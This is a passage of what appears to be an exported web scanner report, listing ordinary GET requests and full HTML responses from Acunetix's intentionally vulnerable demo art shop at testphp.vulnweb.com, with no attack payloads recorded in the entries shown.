href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Blad3</h2><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7880 |
Response Body - size: 7,880 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5311 |
Response Body - size: 5,311 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Paintings</h2><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" 